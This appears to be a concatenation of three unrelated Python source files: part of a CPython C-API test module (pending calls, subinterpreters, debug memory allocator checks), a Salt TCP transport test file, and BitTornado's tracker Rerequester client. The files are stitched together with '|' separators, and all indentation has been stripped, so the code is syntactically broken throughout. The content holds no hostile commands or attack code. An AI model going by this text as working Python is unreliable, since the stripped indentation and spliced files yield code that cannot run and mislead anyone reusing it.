if _testcapi._pending_threadfunc(callback):
break;
def pendingcalls_wait(self, l, n, context = None):
#now, stick around until l[0] has grown to 10
count = 0;
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print("(%i)"%(len(l),),)
for i in range(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print("(%i)"%(len(l),))
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
threads = [threading.Thread(target=self.pendingcalls_thread,
args=(context,))
for i in range(context.nThreads)]
with support.start_threads(threads):
self.pendingcalls_wait(context.l, n, context)
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print("finished threads: ", nFinished)
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
class SubinterpreterTest(unittest.TestCase):
def test_subinterps(self):
import builtins
r, w = os.pipe()
code = """if 1:
import sys, builtins, pickle
with open({:d}, "wb") as f:
pickle.dump(id(sys.modules), f)
pickle.dump(id(builtins), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertNotEqual(pickle.load(f), id(sys.modules))
self.assertNotEqual(pickle.load(f), id(builtins))
def test_subinterps_recent_language_features(self):
r, w = os.pipe()
code = """if 1:
import pickle
with open({:d}, "wb") as f:
@(lambda x:x) # Py 3.9
def noop(x): return x
a = (b := f'1{{2}}3') + noop('x') # Py 3.8 (:=) / 3.6 (f'')
async def foo(arg): return await arg # Py 3.5
pickle.dump(dict(a=a, b=b), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertEqual(pickle.load(f), {'a': '123x', 'b': '123'})
def test_mutate_exception(self):
"""
Exceptions saved in global module state get shared between
individual module instances. This test checks whether or not
a change in one interpreter's module gets reflected into the
other ones.
"""
import binascii
support.run_in_subinterp("import binascii; binascii.Error.foobar = 'foobar'")
self.assertFalse(hasattr(binascii.Error, "foobar"))
class TestThreadState(unittest.TestCase):
@support.reap_threads
def test_thread_state(self):
# some extra thread-state tests driven via _testcapi
def target():
idents = []
def callback():
idents.append(threading.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
self.assertEqual(idents.count(threading.get_ident()), 3,
"Couldn't find main thread correctly in the list")
target()
t = threading.Thread(target=target)
t.start()
t.join()
class Test_testcapi(unittest.TestCase):
locals().update((name, getattr(_testcapi, name))
for name in dir(_testcapi)
if name.startswith('test_') and not name.endswith('_code'))
class Test_testinternalcapi(unittest.TestCase):
locals().update((name, getattr(_testinternalcapi, name))
for name in dir(_testinternalcapi)
if name.startswith('test_'))
class PyMemDebugTests(unittest.TestCase):
PYTHONMALLOC = 'debug'
# '0x04c06e0' or '04C06E0'
PTR_REGEX = r'(?:0x)?[0-9a-fA-F]+'
def check(self, code):
with support.SuppressCrashReport():
out = assert_python_failure('-c', code,
PYTHONMALLOC=self.PYTHONMALLOC)
stderr = out.err
return stderr.decode('ascii', 'replace')
def test_buffer_overflow(self):
out = self.check('import _testcapi; _testcapi.pymem_buffer_overflow()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are not all FORBIDDENBYTE \(0x[0-9a-f]{{2}}\):\n"
r" at tail\+0: 0x78 \*\*\* OUCH\n"
r" at tail\+1: 0xfd\n"
r" at tail\+2: 0xfd\n"
r" .*\n"
r"( The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
r" Data at p: cd cd cd .*\n"
r"\n"
r"Enable tracemalloc to get the memory block allocation traceback\n"
r"\n"
r"Fatal Python error: _PyMem_DebugRawFree: bad trailing pad byte")
regex = regex.format(ptr=self.PTR_REGEX)
regex = re.compile(regex, flags=re.DOTALL)
self.assertRegex(out, regex)
def test_api_misuse(self):
out = self.check('import _testcapi; _testcapi.pymem_api_misuse()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are FORBIDDENBYTE, as expected.\n"
r"( The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
r" Data at p: cd cd cd .*\n"
r"\n"
r"Enable tracemalloc to get the memory block allocation traceback\n"
r"\n"
r"Fatal Python error: _PyMem_DebugRawFree: bad ID: Allocated using API 'm', verified using API 'r'\n")
regex = regex.format(ptr=self.PTR_REGEX)
self.assertRegex(out, regex)
def check_malloc_without_gil(self, code):
out = self.check(code)
expected = ('Fatal Python error: _PyMem_DebugMalloc: '
'Python memory allocator called without holding the GIL')
self.assertIn(expected, out)
def test_pymem_malloc_without_gil(self):
# Debug hooks must raise an error if PyMem_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pymem_malloc_without_gil()'
self.check_malloc_without_gil(code)
def test_pyobject_malloc_without_gil(self):
# Debug hooks must raise an error if PyObject_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pyobject_malloc_without_gil()'
self.check_malloc_without_gil(code)
def check_pyobject_is_freed(self, func_name):
code = textwrap.dedent(f'''
import gc, os, sys, _testcapi
# Disable the GC to avoid crash on GC collection
gc.disable()
try:
_testcapi.{func_name}()
# Exit immediately to avoid a crash while deallocating
# the invalid object
os._exit(0)
except _testcapi.error:
os._exit(1)
''')
assert_python_ok('-c', code, PYTHONMALLOC=self.PYTHONMALLOC)
def test_pyobject_null_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_null_is_freed')
def test_pyobject_uninitialized_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_uninitialized_is_freed')
def test_pyobject_forbidden_bytes_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_forbidden_bytes_is_freed')
def test_pyobject_freed_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_freed_is_freed')
class PyMemMallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'malloc_debug'
@unittest.skipUnless(support.with_pymalloc(), 'need pymalloc')
class PyMemPymallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'pymalloc_debug'
@unittest.skipUnless(Py_DEBUG, 'need Py_DEBUG')
class PyMemDefaultTests(PyMemDebugTests):
# test default allocator of Python compiled in debug mode
PYTHONMALLOC = ''
class Test_ModuleStateAccess(unittest.TestCase):
"""Test access to module start (PEP 573)"""
# The C part of the tests lives in _testmultiphase, in a module called
# _testmultiphase_meth_state_access.
# This module has multi-phase initialization, unlike _testcapi.
def setUp(self):
fullname = '_testmultiphase_meth_state_access' # XXX
origin = importlib.util.find_spec('_testmultiphase').origin
loader = importlib.machinery.ExtensionFileLoader(fullname, origin)
spec = importlib.util.spec_from_loader(fullname, loader)
module = importlib.util.module_from_spec(spec)
loader.exec_module(module)
self.module = module
def test_subclass_get_module(self):
"""PyType_GetModule for defining_class"""
class StateAccessType_Subclass(self.module.StateAccessType):
pass
instance = StateAccessType_Subclass()
self.assertIs(instance.get_defining_module(), self.module)
def test_subclass_get_module_with_super(self):
class StateAccessType_Subclass(self.module.StateAccessType):
def get_defining_module(self):
return super().get_defining_module()
instance = StateAccessType_Subclass()
self.assertIs(instance.get_defining_module(), self.module)
def test_state_access(self):
"""Checks methods defined with and without argument clinic
This tests a no-arg method (get_count) and a method with
both a positional and keyword argument.
"""
a = self.module.StateAccessType()
b = self.module.StateAccessType()
methods = {
'clinic': a.increment_count_clinic,
'noclinic': a.increment_count_noclinic,
}
for name, increment_count in methods.items():
with self.subTest(name):
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 0)
increment_count()
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 1)
increment_count(3)
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 4)
increment_count(-2, twice=True)
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 0)
with self.assertRaises(TypeError):
increment_count(thrice=3)
with self.assertRaises(TypeError):
increment_count(1, 2, 3)
if __name__ == "__main__":
unittest.main()
|
test_tcp.py | # -*- coding: utf-8 -*-
"""
:codeauthor: Thomas Jackson <jacksontj.89@gmail.com>
"""
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import logging
import socket
import threading
import salt.config
import salt.exceptions
import salt.ext.tornado.concurrent
import salt.ext.tornado.gen
import salt.ext.tornado.ioloop
import salt.transport.client
import salt.transport.server
import salt.utils.platform
import salt.utils.process
from salt.ext import six
from salt.ext.six.moves import range
from salt.ext.tornado.testing import AsyncTestCase, gen_test
from salt.transport.tcp import (
SaltMessageClient,
SaltMessageClientPool,
TCPPubServerChannel,
)
from tests.support.helpers import flaky, get_unused_localhost_port
from tests.support.mixins import AdaptedConfigurationTestCaseMixin
from tests.support.mock import MagicMock, patch
# Import Salt Testing libs
from tests.support.unit import TestCase, skipIf
from tests.unit.transport.mixins import (
PubChannelMixin,
ReqChannelMixin,
run_loop_in_thread,
)
log = logging.getLogger(__name__)
class BaseTCPReqCase(TestCase, AdaptedConfigurationTestCaseMixin):
"""
Test the req server/client pair
"""
@classmethod
def setUpClass(cls):
if not hasattr(cls, "_handle_payload"):
return
ret_port = get_unused_localhost_port()
publish_port = get_unused_localhost_port()
tcp_master_pub_port = get_unused_localhost_port()
tcp_master_pull_port = get_unused_localhost_port()
tcp_master_publish_pull = get_unused_localhost_port()
tcp_master_workers = get_unused_localhost_port()
cls.master_config = cls.get_temp_config(
"master",
**{
"transport": "tcp",
"auto_accept": True,
"ret_port": ret_port,
"publish_port": publish_port,
"tcp_master_pub_port": tcp_master_pub_port,
"tcp_master_pull_port": tcp_master_pull_port,
"tcp_master_publish_pull": tcp_master_publish_pull,
"tcp_master_workers": tcp_master_workers,
}
)
cls.minion_config = cls.get_temp_config(
"minion",
**{
"transport": "tcp",
"master_ip": "127.0.0.1",
"master_port": ret_port,
"master_uri": "tcp://127.0.0.1:{0}".format(ret_port),
}
)
cls.process_manager = salt.utils.process.ProcessManager(
name="ReqServer_ProcessManager"
)
cls.server_channel = salt.transport.server.ReqServerChannel.factory(
cls.master_config
)
cls.server_channel.pre_fork(cls.process_manager)
cls.io_loop = salt.ext.tornado.ioloop.IOLoop()
cls.stop = threading.Event()
cls.server_channel.post_fork(cls._handle_payload, io_loop=cls.io_loop)
cls.server_thread = threading.Thread(
target=run_loop_in_thread, args=(cls.io_loop, cls.stop,),
)
cls.server_thread.start()
@classmethod
def tearDownClass(cls):
cls.server_channel.close()
cls.stop.set()
cls.server_thread.join()
cls.process_manager.kill_children()
del cls.server_channel
@classmethod
@salt.ext.tornado.gen.coroutine
def _handle_payload(cls, payload):
"""
TODO: something besides echo
"""
raise salt.ext.tornado.gen.Return((payload, {"fun": "send_clear"}))
@skipIf(salt.utils.platform.is_darwin(), "hanging test suite on MacOS")
class ClearReqTestCases(BaseTCPReqCase, ReqChannelMixin):
"""
Test all of the clear msg stuff
"""
def setUp(self):
self.channel = salt.transport.client.ReqChannel.factory(
self.minion_config, crypt="clear"
)
def tearDown(self):
self.channel.close()
del self.channel
@classmethod
@salt.ext.tornado.gen.coroutine
def _handle_payload(cls, payload):
"""
TODO: something besides echo
"""
raise salt.ext.tornado.gen.Return((payload, {"fun": "send_clear"}))
@skipIf(salt.utils.platform.is_darwin(), "hanging test suite on MacOS")
class AESReqTestCases(BaseTCPReqCase, ReqChannelMixin):
def setUp(self):
self.channel = salt.transport.client.ReqChannel.factory(self.minion_config)
def tearDown(self):
self.channel.close()
del self.channel
@classmethod
@salt.ext.tornado.gen.coroutine
def _handle_payload(cls, payload):
"""
TODO: something besides echo
"""
raise salt.ext.tornado.gen.Return((payload, {"fun": "send"}))
# TODO: make failed returns have a specific framing so we can raise the same exception
# on encrypted channels
@flaky
@skipIf(True, "SLOWTEST skip")
def test_badload(self):
"""
Test a variety of bad requests, make sure that we get some sort of error
"""
msgs = ["", [], tuple()]
for msg in msgs:
with self.assertRaises(salt.exceptions.AuthenticationError):
ret = self.channel.send(msg)
class BaseTCPPubCase(AsyncTestCase, AdaptedConfigurationTestCaseMixin):
"""
Test the req server/client pair
"""
@classmethod
def setUpClass(cls):
ret_port = get_unused_localhost_port()
publish_port = get_unused_localhost_port()
tcp_master_pub_port = get_unused_localhost_port()
tcp_master_pull_port = get_unused_localhost_port()
tcp_master_publish_pull = get_unused_localhost_port()
tcp_master_workers = get_unused_localhost_port()
cls.master_config = cls.get_temp_config(
"master",
**{
"transport": "tcp",
"auto_accept": True,
"ret_port": ret_port,
"publish_port": publish_port,
"tcp_master_pub_port": tcp_master_pub_port,
"tcp_master_pull_port": tcp_master_pull_port,
"tcp_master_publish_pull": tcp_master_publish_pull,
"tcp_master_workers": tcp_master_workers,
}
)
cls.minion_config = cls.get_temp_config(
"minion",
**{
"transport": "tcp",
"master_ip": "127.0.0.1",
"auth_timeout": 1,
"master_port": ret_port,
"master_uri": "tcp://127.0.0.1:{0}".format(ret_port),
}
)
cls.process_manager = salt.utils.process.ProcessManager(
name="ReqServer_ProcessManager"
)
cls.server_channel = salt.transport.server.PubServerChannel.factory(
cls.master_config
)
cls.server_channel.pre_fork(cls.process_manager)
# we also require req server for auth
cls.req_server_channel = salt.transport.server.ReqServerChannel.factory(
cls.master_config
)
cls.req_server_channel.pre_fork(cls.process_manager)
cls.io_loop = salt.ext.tornado.ioloop.IOLoop()
cls.stop = threading.Event()
cls.req_server_channel.post_fork(cls._handle_payload, io_loop=cls.io_loop)
cls.server_thread = threading.Thread(
target=run_loop_in_thread, args=(cls.io_loop, cls.stop,),
)
cls.server_thread.start()
@classmethod
def _handle_payload(cls, payload):
"""
TODO: something besides echo
"""
return payload, {"fun": "send_clear"}
@classmethod
def tearDownClass(cls):
cls.req_server_channel.close()
cls.server_channel.close()
cls.stop.set()
cls.server_thread.join()
cls.process_manager.kill_children()
del cls.req_server_channel
def setUp(self):
super(BaseTCPPubCase, self).setUp()
self._start_handlers = dict(self.io_loop._handlers)
def tearDown(self):
super(BaseTCPPubCase, self).tearDown()
failures = []
for k, v in six.iteritems(self.io_loop._handlers):
if self._start_handlers.get(k) != v:
failures.append((k, v))
if failures:
raise Exception("FDs still attached to the IOLoop: {0}".format(failures))
del self.channel
del self._start_handlers
class AsyncTCPPubChannelTest(AsyncTestCase, AdaptedConfigurationTestCaseMixin):
@skipIf(True, "SLOWTEST skip")
def test_connect_publish_port(self):
"""
test when publish_port is not 4506
"""
opts = self.get_temp_config("master")
opts["master_uri"] = ""
opts["master_ip"] = "127.0.0.1"
opts["publish_port"] = 1234
channel = salt.transport.tcp.AsyncTCPPubChannel(opts)
patch_auth = MagicMock(return_value=True)
patch_client = MagicMock(spec=SaltMessageClientPool)
with patch("salt.crypt.AsyncAuth.gen_token", patch_auth), patch(
"salt.crypt.AsyncAuth.authenticated", patch_auth
), patch("salt.transport.tcp.SaltMessageClientPool", patch_client):
channel.connect()
assert patch_client.call_args[0][0]["publish_port"] == opts["publish_port"]
@skipIf(True, "Skip until we can devote time to fix this test")
class AsyncPubChannelTest(BaseTCPPubCase, PubChannelMixin):
"""
Tests around the publish system
"""
class SaltMessageClientPoolTest(AsyncTestCase):
def setUp(self):
super(SaltMessageClientPoolTest, self).setUp()
sock_pool_size = 5
with patch(
"salt.transport.tcp.SaltMessageClient.__init__",
MagicMock(return_value=None),
):
self.message_client_pool = SaltMessageClientPool(
{"sock_pool_size": sock_pool_size}, args=({}, "", 0)
)
self.original_message_clients = self.message_client_pool.message_clients
self.message_client_pool.message_clients = [
MagicMock() for _ in range(sock_pool_size)
]
def tearDown(self):
with patch(
"salt.transport.tcp.SaltMessageClient.close", MagicMock(return_value=None)
):
del self.original_message_clients
super(SaltMessageClientPoolTest, self).tearDown()
def test_send(self):
for message_client_mock in self.message_client_pool.message_clients:
message_client_mock.send_queue = [0, 0, 0]
message_client_mock.send.return_value = []
self.assertEqual([], self.message_client_pool.send())
self.message_client_pool.message_clients[2].send_queue = [0]
self.message_client_pool.message_clients[2].send.return_value = [1]
self.assertEqual([1], self.message_client_pool.send())
def test_write_to_stream(self):
for message_client_mock in self.message_client_pool.message_clients:
message_client_mock.send_queue = [0, 0, 0]
message_client_mock._stream.write.return_value = []
self.assertEqual([], self.message_client_pool.write_to_stream(""))
self.message_client_pool.message_clients[2].send_queue = [0]
self.message_client_pool.message_clients[2]._stream.write.return_value = [1]
self.assertEqual([1], self.message_client_pool.write_to_stream(""))
def test_close(self):
self.message_client_pool.close()
self.assertEqual([], self.message_client_pool.message_clients)
def test_on_recv(self):
for message_client_mock in self.message_client_pool.message_clients:
message_client_mock.on_recv.return_value = None
self.message_client_pool.on_recv()
for message_client_mock in self.message_client_pool.message_clients:
self.assertTrue(message_client_mock.on_recv.called)
def test_connect_all(self):
@gen_test
def test_connect(self):
yield self.message_client_pool.connect()
for message_client_mock in self.message_client_pool.message_clients:
future = salt.ext.tornado.concurrent.Future()
future.set_result("foo")
message_client_mock.connect.return_value = future
self.assertIsNone(test_connect(self))
def test_connect_partial(self):
@gen_test(timeout=0.1)
def test_connect(self):
yield self.message_client_pool.connect()
for idx, message_client_mock in enumerate(
self.message_client_pool.message_clients
):
future = salt.ext.tornado.concurrent.Future()
if idx % 2 == 0:
future.set_result("foo")
message_client_mock.connect.return_value = future
with self.assertRaises(salt.ext.tornado.ioloop.TimeoutError):
test_connect(self)
class SaltMessageClientCleanupTest(TestCase, AdaptedConfigurationTestCaseMixin):
def setUp(self):
self.listen_on = "127.0.0.1"
self.port = get_unused_localhost_port()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((self.listen_on, self.port))
self.sock.listen(1)
def tearDown(self):
self.sock.close()
del self.sock
def test_message_client(self):
"""
test message client cleanup on close
"""
orig_loop = salt.ext.tornado.ioloop.IOLoop()
orig_loop.make_current()
opts = self.get_temp_config("master")
client = SaltMessageClient(opts, self.listen_on, self.port)
# Mock the io_loop's stop method so we know when it has been called.
orig_loop.real_stop = orig_loop.stop
orig_loop.stop_called = False
def stop(*args, **kwargs):
orig_loop.stop_called = True
orig_loop.real_stop()
orig_loop.stop = stop
try:
assert client.io_loop == orig_loop
client.io_loop.run_sync(client.connect)
# Ensure we are testing the _read_until_future and io_loop teardown
assert client._stream is not None
assert client._read_until_future is not None
assert orig_loop.stop_called is True
# The run_sync call will set stop_called, reset it
orig_loop.stop_called = False
client.close()
# Stop should be called again, client's io_loop should be None
assert orig_loop.stop_called is True
assert client.io_loop is None
finally:
orig_loop.stop = orig_loop.real_stop
del orig_loop.real_stop
del orig_loop.stop_called
class TCPPubServerChannelTest(TestCase, AdaptedConfigurationTestCaseMixin):
@patch("salt.master.SMaster.secrets")
@patch("salt.crypt.Crypticle")
@patch("salt.utils.asynchronous.SyncWrapper")
def test_publish_filtering(self, sync_wrapper, crypticle, secrets):
opts = self.get_temp_config("master")
opts["sign_pub_messages"] = False
channel = TCPPubServerChannel(opts)
wrap = MagicMock()
crypt = MagicMock()
crypt.dumps.return_value = {"test": "value"}
secrets.return_value = {"aes": {"secret": None}}
crypticle.return_value = crypt
sync_wrapper.return_value = wrap
# try simple publish with glob tgt_type
channel.publish({"test": "value", "tgt_type": "glob", "tgt": "*"})
payload = wrap.send.call_args[0][0]
# verify we send it without any specific topic
assert "topic_lst" not in payload
# try simple publish with list tgt_type
channel.publish({"test": "value", "tgt_type": "list", "tgt": ["minion01"]})
payload = wrap.send.call_args[0][0]
# verify we send it with correct topic
assert "topic_lst" in payload
self.assertEqual(payload["topic_lst"], ["minion01"])
# try with syndic settings
opts["order_masters"] = True
channel.publish({"test": "value", "tgt_type": "list", "tgt": ["minion01"]})
payload = wrap.send.call_args[0][0]
# verify we send it without topic for syndics
assert "topic_lst" not in payload
@patch("salt.utils.minions.CkMinions.check_minions")
@patch("salt.master.SMaster.secrets")
@patch("salt.crypt.Crypticle")
@patch("salt.utils.asynchronous.SyncWrapper")
def test_publish_filtering_str_list(
self, sync_wrapper, crypticle, secrets, check_minions
):
opts = self.get_temp_config("master")
opts["sign_pub_messages"] = False
channel = TCPPubServerChannel(opts)
wrap = MagicMock()
crypt = MagicMock()
crypt.dumps.return_value = {"test": "value"}
secrets.return_value = {"aes": {"secret": None}}
crypticle.return_value = crypt
sync_wrapper.return_value = wrap
check_minions.return_value = {"minions": ["minion02"]}
# try simple publish with list tgt_type
channel.publish({"test": "value", "tgt_type": "list", "tgt": "minion02"})
payload = wrap.send.call_args[0][0]
# verify we send it with correct topic
assert "topic_lst" in payload
self.assertEqual(payload["topic_lst"], ["minion02"])
# verify it was correctly calling check_minions
check_minions.assert_called_with("minion02", tgt_type="list")
|
Rerequester.py | # Written by Bram Cohen
# modified for multitracker operation by John Hoffman
# see LICENSE.txt for license information
from horde.BitTornado.zurllib import urlopen, quote
from urlparse import urlparse, urlunparse
from socket import gethostbyname
from btformats import check_peers
from horde.BitTornado.bencode import bdecode
from threading import Thread, Lock
from cStringIO import StringIO
from traceback import print_exc
from socket import error, gethostbyname
from random import shuffle
from sha import sha
from time import time
try:
from os import getpid
except ImportError:
def getpid():
return 1
try:
True
except:
True = 1
False = 0
mapbase64 = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz.-'
keys = {}
basekeydata = str(getpid()) + repr(time()) + 'tracker'
def add_key(tracker):
key = ''
for i in sha(basekeydata+tracker).digest()[-6:]:
key += mapbase64[ord(i) & 0x3F]
keys[tracker] = key
def get_key(tracker):
try:
return "&key="+keys[tracker]
except:
add_key(tracker)
return "&key="+keys[tracker]
class fakeflag:
def __init__(self, state=False):
self.state = state
def wait(self):
pass
def isSet(self):
return self.state
class Rerequester:
def __init__(self, trackerlist, interval, sched, howmany, minpeers,
connect, externalsched, amount_left, up, down,
port, ip, myid, infohash, timeout, errorfunc, excfunc,
maxpeers, doneflag, upratefunc, downratefunc,
unpauseflag = fakeflag(True),
seed_id = '', seededfunc = None, force_rapid_update = False ):
self.excfunc = excfunc
newtrackerlist = []
for tier in trackerlist:
if len(tier)>1:
shuffle(tier)
newtrackerlist += [tier]
self.trackerlist = newtrackerlist
self.lastsuccessful = ''
self.rejectedmessage = 'rejected by tracker - '
self.url = ('?info_hash=%s&peer_id=%s&port=%s' %
(quote(infohash), quote(myid), str(port)))
self.ip = ip
self.interval = interval
self.last = None
self.trackerid = None
self.announce_interval = 30 * 60
self.sched = sched
self.howmany = howmany
self.minpeers = minpeers
self.connect = connect
self.externalsched = externalsched
self.amount_left = amount_left
self.up = up
self.down = down
self.timeout = timeout
self.errorfunc = errorfunc
self.maxpeers = maxpeers
self.doneflag = doneflag
self.upratefunc = upratefunc
self.downratefunc = downratefunc
self.unpauseflag = unpauseflag
if seed_id:
self.url += '&seed_id='+quote(seed_id)
self.seededfunc = seededfunc
if seededfunc:
self.url += '&check_seeded=1'
self.force_rapid_update = force_rapid_update
self.last_failed = True
self.never_succeeded = True
self.errorcodes = {}
self.lock = SuccessLock()
self.special = None
self.stopped = False
def start(self):
self.sched(self.c, self.interval/2)
self.d(0)
def c(self):
if self.stopped:
return
if not self.unpauseflag.isSet() and (
self.howmany() < self.minpeers or self.force_rapid_update ):
self.announce(3, self._c)
else:
self._c()
def _c(self):
self.sched(self.c, self.interval)
def d(self, event = 3):
if self.stopped:
return
if not self.unpauseflag.isSet():
self._d()
return
self.announce(event, self._d)
def _d(self):
if self.never_succeeded:
self.sched(self.d, 60) # retry in 60 seconds
elif self.force_rapid_update:
return
else:
self.sched(self.d, self.announce_interval)
def hit(self, event = 3):
if not self.unpauseflag.isSet() and (
self.howmany() < self.minpeers or self.force_rapid_update ):
self.announce(event)
def announce(self, event = 3, callback = lambda: None, specialurl = None):
if specialurl is not None:
s = self.url+'&uploaded=0&downloaded=0&left=1' # don't add to statistics
if self.howmany() >= self.maxpeers:
s += '&numwant=0'
else:
s += '&no_peer_id=1&compact=1'
self.last_failed = True # force true, so will display an error
self.special = specialurl
self.rerequest(s, callback)
return
else:
s = ('%s&uploaded=%s&downloaded=%s&left=%s' %
(self.url, str(self.up()), str(self.down()),
str(self.amount_left())))
if self.last is not None:
s += '&last=' + quote(str(self.last))
if self.trackerid is not None:
s += '&trackerid=' + quote(str(self.trackerid))
if self.howmany() >= self.maxpeers:
s += '&numwant=0'
else:
s += '&no_peer_id=1&compact=1'
if event != 3:
s += '&event=' + ['started', 'completed', 'stopped'][event]
if event == 2:
self.stopped = True
self.rerequest(s, callback)
def snoop(self, peers, callback = lambda: None): # tracker call support
self.rerequest(self.url
+'&event=stopped&port=0&uploaded=0&downloaded=0&left=1&tracker=1&numwant='
+str(peers), callback)
def rerequest(self, s, callback):
if not self.lock.isfinished(): # still waiting for prior cycle to complete??
def retry(self = self, s = s, callback = callback):
self.rerequest(s, callback)
self.sched(retry,5) # retry in 5 seconds
return
self.lock.reset()
rq = Thread(target = self._rerequest, args = [s, callback])
rq.setDaemon(False)
rq.start()
def _rerequest(self, s, callback):
try:
def fail (self = self, callback = callback):
self._fail(callback)
if self.ip:
try:
s += '&ip=' + gethostbyname(self.ip)
except:
self.errorcodes['troublecode'] = 'unable to resolve: '+self.ip
self.externalsched(fail)
self.errorcodes = {}
if self.special is None:
for t in range(len(self.trackerlist)):
for tr in range(len(self.trackerlist[t])):
tracker = self.trackerlist[t][tr]
if self.rerequest_single(tracker, s, callback):
if not self.last_failed and tr != 0:
del self.trackerlist[t][tr]
self.trackerlist[t] = [tracker] + self.trackerlist[t]
return
else:
tracker = self.special
self.special = None
if self.rerequest_single(tracker, s, callback):
return
# no success from any tracker
self.externalsched(fail)
except:
self.exception(callback)
def _fail(self, callback):
if ( (self.upratefunc() < 100 and self.downratefunc() < 100)
or not self.amount_left() ):
for f in ['rejected', 'bad_data', 'troublecode']:
if self.errorcodes.has_key(f):
r = self.errorcodes[f]
break
else:
r = 'Problem connecting to tracker - unspecified error'
return
self.errorfunc(r)
self.last_failed = True
self.lock.give_up()
self.externalsched(callback)
def rerequest_single(self, t, s, callback):
l = self.lock.set()
rq = Thread(target = self._rerequest_single, args = [t, s+get_key(t), l, callback])
rq.setDaemon(False)
rq.start()
self.lock.wait()
if self.lock.success:
self.lastsuccessful = t
self.last_failed = False
self.never_succeeded = False
return True
if not self.last_failed and self.lastsuccessful == t:
# if the last tracker hit was successful, and you've just tried the tracker
# you'd contacted before, don't go any further, just fail silently.
self.last_failed = True
self.externalsched(callback)
self.lock.give_up()
return True
return False # returns true if it wants rerequest() to exit
def _rerequest_single(self, t, s, l, callback):
try:
closer = [None]
def timedout(self = self, l = l, closer = closer):
if self.lock.trip(l):
self.errorcodes['troublecode'] = 'Problem connecting to tracker - timeout exceeded'
self.lock.unwait(l)
try:
closer[0]()
except:
pass
self.externalsched(timedout, self.timeout)
err = None
try:
h = urlopen(t+s)
closer[0] = h.close
data = h.read()
except (IOError, error), e:
err = 'Problem connecting to tracker - ' + str(e)
except:
err = 'Problem connecting to tracker'
try:
h.close()
except:
pass
if err:
if self.lock.trip(l):
self.errorcodes['troublecode'] = err
self.lock.unwait(l)
return
if data == '':
if self.lock.trip(l):
self.errorcodes['troublecode'] = 'no data from tracker'
self.lock.unwait(l)
return
try:
r = bdecode(data, sloppy=1)
check_peers(r)
except ValueError, e:
if self.lock.trip(l):
self.errorcodes['bad_data'] = 'bad data from tracker - ' + str(e)
self.lock.unwait(l)
return
if r.has_key('failure reason'):
if self.lock.trip(l):
self.errorcodes['rejected'] = self.rejectedmessage + r['failure reason']
self.lock.unwait(l)
return
if self.lock.trip(l, True): # success!
self.lock.unwait(l)
else:
callback = lambda: None # attempt timed out, don't do a callback
# even if the attempt timed out, go ahead and process data
def add(self = self, r = r, callback = callback):
self.postrequest(r, callback)
self.externalsched(add)
except:
self.exception(callback)
def postrequest(self, r, callback):
if r.has_key('warning message'):
self.errorfunc('warning from tracker - ' + r['warning message'])
self.announce_interval = r.get('interval', self.announce_interval)
self.interval = r.get('min interval', self.interval)
self.trackerid = r.get('tracker id', self.trackerid)
self.last = r.get('last')
# ps = len(r['peers']) + self.howmany()
p = r['peers']
peers = []
if type(p) == type(''):
for x in xrange(0, len(p), 6):
ip = '.'.join([str(ord(i)) for i in p[x:x+4]])
port = (ord(p[x+4]) << 8) | ord(p[x+5])
peers.append(((ip, port), 0))
else:
for x in p:
peers.append(((x['ip'].strip(), x['port']), x.get('peer id',0)))
ps = len(peers) + self.howmany()
if ps < self.maxpeers:
if self.doneflag.isSet():
if r.get('num peers', 1000) - r.get('done peers', 0) > ps * 1.2:
self.last = None
else:
if r.get('num peers', 1000) > ps * 1.2:
self.last = None
if self.seededfunc and r.get('seeded'):
self.seededfunc()
elif peers:
shuffle(peers)
self.connect(peers)
callback()
def exception(self, callback):
data = StringIO()
print_exc(file = data)
def r(s = data.getvalue(), callback = callback):
if self.excfunc:
self.excfunc(s)
else:
print s
callback()
